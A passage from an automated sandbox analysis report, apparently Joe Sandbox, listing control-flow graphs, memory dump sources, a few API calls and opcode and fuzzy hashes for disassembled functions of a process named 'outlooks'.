133->166 139 82a1f1f-82a1f23 135->139 136->139 140 82a1eb5-82a1eb6 136->140 137->143 138->121 145 82a1ebb 138->145 139->133 144 82a1f25-82a1f26 139->144 140->138 148 82a1e5d-82a1e61 143->148 149 82a1ec7-82a1ecb 143->149 150 82a1f27-82a1f36 144->150 145->150 151 82a1ebd-82a1ec6 145->151 157 82a1ecd-82a1ed6 149->157 158 82a1f37-82a1f7e 149->158 150->158 151->149 158->129 173 82a20b6-82a20ba 165->173 166->173 193 82a20bc call 82a21b0 173->193 194 82a20bc call 82a21a1 173->194 176 82a20c2-82a20cd 180 82a20d8-82a2104 176->180 181 82a20cf-82a20d1 176->181 187 82a210f 180->187 188 82a2106 180->188 181->180 190 82a2110 187->190 188->187 190->190 193->176 194->176
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: j^
                                                                            • API String ID: 0-2120829721
                                                                            • Opcode ID: 43a31363b115ff803572fc2216efef823d447d329e198ea7dbb3132036f5601a
                                                                            • Instruction ID: 65d819486230b7724e50699b2b2d47c446791ba5b67c797d3e62ce69dcba78b3
                                                                            • Opcode Fuzzy Hash: 43a31363b115ff803572fc2216efef823d447d329e198ea7dbb3132036f5601a
                                                                            • Instruction Fuzzy Hash: A6B17D21E287A6DBE712B63C9C507EA3B61AFC2732F44016BC192CF191DF54845AC7D6
                                                                            Function 01936780 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 195 1936780-1936781 196 1936783-193681c DuplicateHandle 195->196 197 193670f-1936711 195->197 201 1936825-1936842 196->201 202 193681e-1936824 196->202 199 1936713-1936749 call 193611c 197->199 200 193669f-19366a2 197->200 211 193674e-1936774 199->211 204 19366a4-19366aa 200->204 205 19366ab-193670d 200->205 202->201 204->205
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0193674E,?,?,?,?,?), ref: 0193680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 92867dfff5f540232663c8fd1e86f97f959c0148f09ba28361a38415bb5f5f8e
                                                                            • Instruction ID: cc69d61dc78dde7745fdb28ad67cba25bc1f74a4c50de4c66523d92a78649e47
                                                                            • Opcode Fuzzy Hash: 92867dfff5f540232663c8fd1e86f97f959c0148f09ba28361a38415bb5f5f8e
                                                                            • Instruction Fuzzy Hash: 9D414B76900208AFDF01CF99D844ADEBFF9FB88310F14801AE918A7311D735A915CFA5
                                                                            Function 01936414 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 217 1936414-1937431 CreateActCtxA 220 1937433-1937439 217->220 221 193743a-1937494 217->221 220->221 228 19374a3-19374a7 221->228 229 1937496-1937499 221->229 230 19374a9-19374b5 228->230 231 19374b8 228->231 229->228 230->231 232 19374b9 231->232 232->232
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01937421
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 3ab24a64bfcaf289e84ca35df07a15ac0884b6f0b29c104ebc20cb27a74dbdad
                                                                            • Instruction ID: 17700d1c63478dde39bc677966637f7ee2a5655ad479c05f01f1fb50ce807c75
                                                                            • Opcode Fuzzy Hash: 3ab24a64bfcaf289e84ca35df07a15ac0884b6f0b29c104ebc20cb27a74dbdad
                                                                            • Instruction Fuzzy Hash: 9C41A3B0C0071DCBDB24DFA9C848B9EBBF6BF89715F20805AD508AB251DB756946CF90
                                                                            Function 01937364 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 234 1937364-193736c 235 1937370-1937431 CreateActCtxA 234->235 237 1937433-1937439 235->237 238 193743a-1937494 235->238 237->238 245 19374a3-19374a7 238->245 246 1937496-1937499 238->246 247 19374a9-19374b5 245->247 248 19374b8 245->248 246->245 247->248 249 19374b9 248->249 249->249
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01937421
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 76f8d768eee364a53674bea2d79ee318ed25b8732e3467fd748d619e706555ee
                                                                            • Instruction ID: 5347d8b9f3fcc38b52b2c9ee31cfe0894d7adb5c5b59e16180246bf5810bc328
                                                                            • Opcode Fuzzy Hash: 76f8d768eee364a53674bea2d79ee318ed25b8732e3467fd748d619e706555ee
                                                                            • Instruction Fuzzy Hash: 0541B2B1C00719CBDB24CFA9C848B9EBBF6BF89705F24805AD408AB251D7756946CF90
                                                                            Function 0193611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 251 193611c-193681c DuplicateHandle 253 1936825-1936842 251->253 254 193681e-1936824 251->254 254->253
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0193674E,?,?,?,?,?), ref: 0193680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 76d520f296dc0c2d5e4ef4f7105ee6d495701d225c5550ec2fc01442dc1efc4f
                                                                            • Instruction ID: 14eb3a584569b7acae258ce844994e7f9eaae10d79fe631b3d4287c9d43281fc
                                                                            • Opcode Fuzzy Hash: 76d520f296dc0c2d5e4ef4f7105ee6d495701d225c5550ec2fc01442dc1efc4f
                                                                            • Instruction Fuzzy Hash: 6621B5B5900358AFDB10CF9AD884ADEFBF9EB48310F14841AE919A7350D378A954CFA5
                                                                            Function 0193AF60 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 257 193af60-193c230 259 193c232-193c235 257->259 260 193c238-193c263 GetModuleHandleW 257->260 259->260 261 193c265-193c26b 260->261 262 193c26c-193c280 260->262 261->262
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0193C01C), ref: 0193C256
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3873697974.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_1930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: cea4426d1a9b56d261dff813c52e9990ee01289845d3c9cf907e8ad47f0819aa
                                                                            • Instruction ID: 5eafb760ebb0a0f51c026fb6de168130200b4d3762785b6f9fcaa90e4fc16517
                                                                            • Opcode Fuzzy Hash: cea4426d1a9b56d261dff813c52e9990ee01289845d3c9cf907e8ad47f0819aa
                                                                            • Instruction Fuzzy Hash: D011F0B6C006498BDB14DF9AC444B9EFBF4EB88220F10851AD919B7210D3B9A945CFA5
                                                                            Function 082A21B0 Relevance: .4, Instructions: 437COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 777 82a21b0-82a2253 785 82a2259-82a226f 777->785 786 82a2336-82a23bc 777->786 789 82a2271-82a227b 785->789 790 82a22b5-82a22ee call 82a19d0 785->790 805 82a25fd-82a260c 786->805 789->786 791 82a2281-82a2294 789->791 803 82a231b-82a2331 790->803 804 82a22f0-82a2303 790->804 791->786 796 82a229a-82a22b0 791->796 796->786 803->786 804->803 809 82a2305-82a2313 804->809 807 82a260e-82a2623 805->807 808 82a2625 805->808 810 82a2627-82a2629 807->810 808->810 809->803 811 82a262f-82a2654 call 82a0dc8 810->811 812 82a23c1-82a23d4 810->812 822 82a2698-82a26c4 811->822 823 82a2656-82a2696 811->823 815 82a23ec-82a2411 812->815 816 82a23d6-82a23dc 812->816 824 82a24d0-82a2511 call 82a0a20 815->824 825 82a2417-82a24bf call 82a0a20 call 82a0658 815->825 818 82a23de 816->818 819 82a23e0-82a23e2 816->819 818->815 819->815 840 82a26cb-82a2762 call 82a0a20 822->840 823->840 846 82a2549-82a2575 824->846 847 82a2513-82a2529 824->847 887 82a24c5 call 82a28a0 825->887 888 82a24c5 call 82a2891 825->888 877 82a278f-82a2793 840->877 878 82a2764-82a2777 840->878 862 82a25e2-82a25f8 846->862 863 82a2577-82a2580 846->863 854 82a252f-82a2547 847->854 855 82a27e4 847->855 854->846 854->847 857 82a27e9-82a27f0 855->857 860 82a27fe 857->860 861 82a27f2 857->861 867 82a27ff 860->867 861->860 862->805 863->855 865 82a2586-82a25e0 863->865 865->862 865->863 866 82a24cb 866->862 867->867 879 82a27cf-82a27e2 877->879 880 82a2795-82a27a8 877->880 878->877 883 82a2779-82a2787 878->883 879->857 880->879 884 82a27aa-82a27c7 880->884 883->877 884->879 887->866 888->866
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ffa4c9672ce9cbd63319fd372f8f2187eedd1e3d08dc9e9ea2eb98dca7189114
                                                                            • Instruction ID: b30403f60cef97f185bc21cbb0cbfa94a99c36537b77d4701615bb6cbc6db47e
                                                                            • Opcode Fuzzy Hash: ffa4c9672ce9cbd63319fd372f8f2187eedd1e3d08dc9e9ea2eb98dca7189114
                                                                            • Instruction Fuzzy Hash: 6712F534A10219CFCB54EF64C894AADB7B2FF89301F5085A8D94AAB355DB70ED86CF50
                                                                            Function 082A9700 Relevance: .4, Instructions: 408COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 889 82a9700-82a970e 890 82a99de-82a9a03 889->890 891 82a9714-82a971a 889->891 899 82a9a0a-82a9a12 890->899 892 82a9808-82a980b 891->892 893 82a9720-82a9722 891->893 894 82a980d-82a9810 892->894 895 82a9836-82a9842 892->895 896 82a9728-82a972b 893->896 897 82a98ad-82a98b1 893->897 894->899 900 82a9816-82a9831 call 82a91e0 894->900 904 82a9874-82a988f call 82a96c8 895->904 905 82a9844-82a9848 895->905 896->899 901 82a9731-82a973d 896->901 902 82a98c9-82a98d5 897->902 903 82a98b3-82a98c4 call 82a91e0 897->903 922 82a9a19-82a9a36 899->922 927 82a99d8-82a99dd 900->927 907 82a973f-82a9743 901->907 908 82a9763-82a976e 901->908 912 82a9907-82a991a 902->912 913 82a98d7-82a98db 902->913 903->927 904->927 910 82a984a-82a985e 905->910 911 82a9860-82a986b 905->911 917 82a9749-82a975d 907->917 918 82a9894-82a98a8 907->918 908->922 923 82a9774-82a9783 908->923 910->904 910->911 911->904 912->922 925 82a9920-82a9934 912->925 920 82a98dd-82a98f1 913->920 921 82a98f3-82a98fe 913->921 917->908 917->918 918->908 920->912 920->921 921->912 940 82a9a48-82a9a9c 922->940 941 82a9a38-82a9a47 922->941 923->922 931 82a9789-82a9798 923->931 925->922 926 82a993a-82a994e 925->926 926->922 932 82a9954-82a9968 926->932 931->922 937 82a979e-82a97ad 931->937 932->922 939 82a996e-82a9982 932->939 937->922 942 82a97b3-82a97bc 937->942 939->922 943 82a9988-82a9991 939->943 961 82a9b7a-82a9b9f 940->961 962 82a9aa2-82a9aa4 940->962 942->922 944 82a97c2-82a97cc 942->944 943->922 945 82a9997-82a99a1 943->945 944->922 948 82a97d2-82a97dc 944->948 945->922 950 82a99a3-82a99ad 945->950 948->922 949 82a97e2-82a97ec 948->949 949->922 952 82a97f2-82a9803 call 82a96c8 949->952 950->922 953 82a99af-82a99b9 950->953 952->927 953->922 955 82a99bb-82a99c5 953->955 955->922 958 82a99c7-82a99ce 955->958 958->927 959 82a99d3 call 82a96c8 958->959 959->927 964 82a9ba6-82a9bcb 961->964 963 82a9aaa-82a9ab1 962->963 962->964 966 82a9b6b-82a9b73 963->966 967 82a9ab7 963->967 977 82a9bd2-82a9bf6 964->977 966->961 967->966 968 82a9b0b-82a9b1d call 82a91e0 967->968 969 82a9abe-82a9ac1 967->969 970 82a9b00-82a9b03 967->970 984 82a9b1f-82a9b24 968->984 985 82a9b27-82a9b2b 968->985 969->977 978 82a9ac7-82a9ad2 969->978 973 82a9b09 970->973 974 82a9bfd-82a9c32 970->974 973->978 977->974 979 82a9ade-82a9afd call 82a96c8 978->979 980 82a9ad4-82a9ad6 978->980 980->979 985->978 990 82a9b2d-82a9b33 985->990 990->978 993 82a9b35-82a9b68 990->993
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6fea7fc21b11891e61547ce8bea0f5a4710f9a6c0123881fa024f9e2f22606f8
                                                                            • Instruction ID: b21a683131cee1f6df261e99c49ac10885c4870d9d4887acfca0116c4f31bc77
                                                                            • Opcode Fuzzy Hash: 6fea7fc21b11891e61547ce8bea0f5a4710f9a6c0123881fa024f9e2f22606f8
                                                                            • Instruction Fuzzy Hash: E3E11230710601CFD715CBA9D58462EBFE6FF85312B688A1AD456CB786CB30EC86CB95
                                                                            Function 082A28A0 Relevance: .4, Instructions: 366COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1001 82a28a0-82a28b0 1003 82a29c9-82a29ee 1001->1003 1004 82a28b6-82a28ba 1001->1004 1006 82a29f5-82a2a1a 1003->1006 1005 82a28c0-82a28c9 1004->1005 1004->1006 1008 82a28cf-82a28f6 1005->1008 1009 82a2a21-82a2a57 1005->1009 1006->1009 1018 82a29be-82a29c8 1008->1018 1019 82a28fc-82a28fe 1008->1019 1025 82a2a5e-82a2abd 1009->1025 1021 82a291f-82a2921 1019->1021 1022 82a2900-82a2903 1019->1022 1026 82a2924-82a2928 1021->1026 1024 82a2909-82a2913 1022->1024 1022->1025 1024->1025 1027 82a2919-82a291d 1024->1027 1042 82a2abf-82a2ac4 1025->1042 1043 82a2ae1-82a2af8 1025->1043 1029 82a292a-82a2939 1026->1029 1030 82a2989-82a2995 1026->1030 1027->1021 1027->1026 1029->1025 1036 82a293f-82a2986 1029->1036 1030->1025 1031 82a299b-82a29b8 1030->1031 1031->1018 1031->1019 1036->1030 1102 82a2ac7 call 82a2d78 1042->1102 1103 82a2ac7 call 82a2d88 1042->1103 1052 82a2be8-82a2bf8 1043->1052 1053 82a2afe-82a2be3 call 82a19d0 call 82a0dc8 1043->1053 1045 82a2acd-82a2ad6 call 82a30a8 1048 82a2adc 1045->1048 1050 82a2d0a-82a2d15 1048->1050 1059 82a2d17-82a2d27 1050->1059 1060 82a2d44-82a2d65 1050->1060 1057 82a2bfe-82a2cd7 call 82a19d0 1052->1057 1058 82a2ce5-82a2d01 1052->1058 1053->1052 1098 82a2cd9 1057->1098 1099 82a2ce2 1057->1099 1058->1050 1068 82a2d29-82a2d2f 1059->1068 1069 82a2d37-82a2d3d 1059->1069 1068->1069 1069->1060 1098->1099 1099->1058 1102->1045 1103->1045
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23d22ede17d7e45cc83cfddcebee6dfeccdae7f12ec418559e3de449807d4d1a
                                                                            • Instruction ID: f30c15b9119092c8e14423368b28da3dfdb1b7cc938d0a98e92b1c4d9df41079
                                                                            • Opcode Fuzzy Hash: 23d22ede17d7e45cc83cfddcebee6dfeccdae7f12ec418559e3de449807d4d1a
                                                                            • Instruction Fuzzy Hash: 77E14234A10209DFCB44DF64D4949AEBBB2FF89310F508569E906AB364DF34ED82CB91
                                                                            Function 082A5988 Relevance: .3, Instructions: 319COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1196 82a5988-82a59b8 1201 82a59ba-82a59c6 1196->1201 1202 82a59cd 1196->1202 1203 82a59d0-82a59d6 1201->1203 1207 82a59c8-82a59cb 1201->1207 1202->1203 1205 82a59d8-82a59db 1203->1205 1206 82a59dd-82a59e1 1203->1206 1205->1206 1208 82a59e3-82a59e6 1205->1208 1206->1208 1209 82a5a3e-82a5a62 1206->1209 1207->1203 1210 82a59e8-82a59eb 1208->1210 1211 82a59f2-82a59f7 1208->1211 1218 82a5a69-82a5aae 1209->1218 1210->1211 1214 82a59ed-82a59f0 1210->1214 1212 82a59fb-82a59fd 1211->1212 1215 82a59ff-82a5a01 1212->1215 1216 82a5a06-82a5a11 1212->1216 1214->1211 1217 82a59f9 1214->1217 1215->1218 1219 82a5a03 1215->1219 1220 82a5a13 1216->1220 1221 82a5a17-82a5a1d 1216->1221 1217->1212 1233 82a5ab0-82a5ab5 1218->1233 1234 82a5ab6-82a5ab9 1218->1234 1219->1216 1220->1221 1223 82a5a1f 1221->1223 1224 82a5a23-82a5a29 1221->1224 1223->1224 1226 82a5a2b 1224->1226 1227 82a5a2f-82a5a3b 1224->1227 1226->1227 1235 82a5abb-82a5ac6 1234->1235 1236 82a5ad9-82a5b42 1234->1236 1237 82a5ac8-82a5acd 1235->1237 1238 82a5ace-82a5ad6 1235->1238 1244 82a5b57 1236->1244 1245 82a5b44-82a5b55 1236->1245 1237->1238 1238->1236 1246 82a5b59-82a5b65 1244->1246 1245->1246 1248 82a5b6b-82a5b70 1246->1248 1249 82a5b67-82a5b69 1246->1249 1251 82a5bb3-82a5bd9 1248->1251 1249->1248 1250 82a5b72-82a5bb0 1249->1250 1250->1251 1256 82a5bdf-82a5c1b call 82a0a20 * 2 call 82a0dc8 1251->1256 1257 82a5cb4-82a5cba 1251->1257 1285 82a5c1d-82a5c54 call 82a0a20 call 82a0dc8 1256->1285 1286 82a5c56-82a5c82 call 82a0dc8 1256->1286 1306 82a5cbc call 82a5e28 1257->1306 1307 82a5cbc call 82a5e11 1257->1307 1261 82a5cc2-82a5cc6 1264 82a5d3b-82a5d4e 1261->1264 1265 82a5cc8-82a5ccc 1261->1265 1269 82a5d50-82a5d54 1264->1269 1267 82a5cce-82a5d0d call 82a0a20 call 82a0dc8 1265->1267 1268 82a5d0f-82a5d34 call 82a0dc8 1265->1268 1267->1269 1268->1264 1272 82a5d5f 1269->1272 1273 82a5d56 1269->1273 1273->1272 1300 82a5c8a-82a5cad call 82a0a20 call 82a0dc8 1285->1300 1286->1300 1300->1257 1306->1261 1307->1261
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5551decdba5e869cec5158960a47f6bba0f908c000e244ce83f30ac386927500
                                                                            • Instruction ID: 67821210ddd8b187861be7877cfe3b1c39d9f6932d0ed91e160f7fa63482401e
                                                                            • Opcode Fuzzy Hash: 5551decdba5e869cec5158960a47f6bba0f908c000e244ce83f30ac386927500
                                                                            • Instruction Fuzzy Hash: 73C1C030B106059FDB19DFA8D950BAF7BB2AF88701F144529E912AB391CB74ED42CBD1
                                                                            Function 082A6680 Relevance: .3, Instructions: 309COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1308 82a6680-82a6701 1317 82a670a-82a6718 1308->1317 1318 82a6703-82a6708 1308->1318 1319 82a671b-82a6796 call 82a2fc8 1317->1319 1318->1319 1403 82a6799 call 82a6b48 1319->1403 1404 82a6799 call 82a6b14 1319->1404 1329 82a679f-82a67a6 1330 82a67a8-82a67ad 1329->1330 1331 82a67af-82a67ec 1329->1331 1332 82a67ef-82a685c 1330->1332 1331->1332 1344 82a696d-82a69cb call 82a0788 call 82a0950 call 82a0788 1332->1344 1345 82a6862-82a696b call 82a63c8 call 82a0788 call 82a0950 call 82a6360 call 82a19d0 call 82a0a20 1332->1345 1367 82a69d2-82a69fa 1344->1367 1368 82a69cd call 82a0a20 1344->1368 1345->1367 1376 82a69fc-82a6a34 1367->1376 1377 82a6a36-82a6a55 1367->1377 1368->1367 1376->1377 1382 82a6a57-82a6a5b 1377->1382 1385 82a6a5d 1382->1385 1386 82a6a66-82a6a95 1382->1386 1385->1386 1390 82a6a53-82a6a55 1386->1390 1391 82a6a97-82a6aa3 1386->1391 1390->1382 1396 82a6aa4 1391->1396 1396->1396 1403->1329 1404->1329
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 451a2ef5a723cb613ccca6f6c94770f85a01878e5cbdaf3266740abede1fd61a
                                                                            • Instruction ID: 1341e2314a81d0d036c01f8ebe0656ef0e0bc840bc9112b30191d6fdc951b071
                                                                            • Opcode Fuzzy Hash: 451a2ef5a723cb613ccca6f6c94770f85a01878e5cbdaf3266740abede1fd61a
                                                                            • Instruction Fuzzy Hash: 0DD1EE74B11218AFDB44EFA8D894EAEB7B6FF88700F544458E905AB3A5CB74EC41CB50
                                                                            Function 082A7920 Relevance: .3, Instructions: 295COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1405 82a7920-82a7980 1411 82a7988-82a79c1 1405->1411 1415 82a79ca-82a7a0c 1411->1415 1416 82a79c3-82a79c8 1411->1416 1417 82a7a0f-82a7a19 1415->1417 1416->1417 1418 82a7a1f-82a7b0d call 82a0a20 * 2 call 82a0dc8 * 2 call 82a0a20 call 82a0dc8 1417->1418 1419 82a7b15-82a7bfa call 82a0788 * 2 1417->1419 1418->1419 1466 82a7c3e-82a7ca9 call 82a0788 1419->1466 1467 82a7bfc-82a7c31 1419->1467 1482 82a7cab 1466->1482 1483 82a7cb4 1466->1483 1467->1466 1479 82a7c33-82a7c36 1467->1479 1479->1466 1482->1483 1484 82a7cb5 1483->1484 1484->1484
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8b84f1680e2c36934d989fc5208dd1f2bb723ed0b0fdc634686565469a5a9c04
                                                                            • Instruction ID: 29076801623c9ba5731e99ab5aee3da096ce9e497be8eac5f958a415f6f3b26f
                                                                            • Opcode Fuzzy Hash: 8b84f1680e2c36934d989fc5208dd1f2bb723ed0b0fdc634686565469a5a9c04
                                                                            • Instruction Fuzzy Hash: A4C1B874B10618DFDB44DFA8C994AADB7B6FF88301F104168E906AB3A5DB70EC42CB50
                                                                            Function 082A7912 Relevance: .3, Instructions: 281COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa12352816083db28dc60629605a3651855f18e4aec52fd7995633216cec4b8c
                                                                            • Instruction ID: 8a86b19410a9cbc61455fc314b197cef3a08e0dad2253af7a451a8c4340566d9
                                                                            • Opcode Fuzzy Hash: fa12352816083db28dc60629605a3651855f18e4aec52fd7995633216cec4b8c
                                                                            • Instruction Fuzzy Hash: 83C1DA74B10618DFDB44DFA4C994AAEB7B6FF88301F104568E506AB3A5DB70EC42CB50
                                                                            Function 082A6650 Relevance: .3, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 266c474e336a384b145295565f15f501e640af4759484dc43f99cece340af6f4
                                                                            • Instruction ID: 49199160bf9783f41bfe8020fea1221d5685b0e522933e5b53c7415974bb8c44
                                                                            • Opcode Fuzzy Hash: 266c474e336a384b145295565f15f501e640af4759484dc43f99cece340af6f4
                                                                            • Instruction Fuzzy Hash: C1B12074B11218AFDB44DBA8D894EAEBBB6FF89700F544058E905AB3A5CB74EC41CB50
                                                                            Function 082A6B14 Relevance: .3, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0881c9c00bff89ca196d817508f9e3b0569b1457fdbd6aa22e6989f44af4922c
                                                                            • Instruction ID: c54c15aca4334d0c623eeae5c167929918dc5e845de17d816d565d42f6d3c5b3
                                                                            • Opcode Fuzzy Hash: 0881c9c00bff89ca196d817508f9e3b0569b1457fdbd6aa22e6989f44af4922c
                                                                            • Instruction Fuzzy Hash: FBA169347106148FCB45EF78C8A4AAE7BB6AFC9700B5045A8E5069B3A4DF74ED42CB91
                                                                            Function 082A6B48 Relevance: .3, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b9244bdf6aaec89bd85a3035690c9b23df040651c2c727abfd6c293e8f57d5b
                                                                            • Instruction ID: a8a0e9e1e7f142330b653eee0c117cf2e2f4f33b0b0ede69695877808d54395e
                                                                            • Opcode Fuzzy Hash: 1b9244bdf6aaec89bd85a3035690c9b23df040651c2c727abfd6c293e8f57d5b
                                                                            • Instruction Fuzzy Hash: 47A15734B106148FCB44EF78C894AAE77B6AFC9700F508668E5169B3A4DF74ED42CB91
                                                                            Function 082A3170 Relevance: .2, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
